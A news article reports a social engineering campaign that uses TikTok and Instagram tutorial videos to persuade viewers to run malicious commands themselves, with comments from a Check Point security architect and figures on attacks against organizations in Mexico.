Cybercriminals use TikTok Tutorials to Bypass Security Defenses

Cybersecurity organizations have identified a new attack method that uses video tutorials on platforms such as TikTok and Instagram. The tactic instructs users to execute malicious commands directly on their systems, bypassing traditional security detection mechanisms.

The effectiveness of this threat does not lie in the technical complexity of the malware, but in an innovative distribution strategy based on social engineering. “These types of attacks do not send malicious links or attachments. The video itself is harmless, but it instructs the user to perform actions that ultimately compromise their security,” says Aaron Rose, Security Architect, Check Point, to Expansión. This method exploits the trust users place in instructional content to compromise their devices.

The evolution of cyberthreats shows a shift from traditional attack vectors, such as email, to high-engagement platforms like social media. This tactic represents a sophisticated form of social engineering, where malicious content is disguised as opportunity. Attackers produce videos, often using AI tools to simulate legitimate content creators, that offer appealing benefits such as activating free software, accessing premium services, or increasing social media followers.

By instructing users to manually run a command, attackers cause the individual to initiate the infection on their own system. This bypasses perimeter and email defenses designed to detect and block suspicious files or links. The threat is no longer an attachment, but a verbal or textual instruction embedded in audiovisual content that appears harmless.

The impact of this attack method goes beyond the personal sphere and presents a significant risk to the corporate environment. The increasing phenomenon of “bring your own device” (BYOD) and the use of corporate devices for personal tasks blur the lines between private and professional environments. An employee who uses a company device to view these tutorials and executes the suggested commands can become the entry point for an intrusion across the organization’s network. 

According to Check Point, Mexico sees over 3,200 weekly attacks targeting organizations — 68% above the global average. Attribution and mitigation of these attacks pose considerable challenges. The privacy policies of platforms such as TikTok, which do not share the IP addresses of content creators, complicate identification of the campaign’s origin. This forces cybersecurity teams to adopt a reactive approach, tracking the malware back to its command and control (C2) center after the infection has occurred.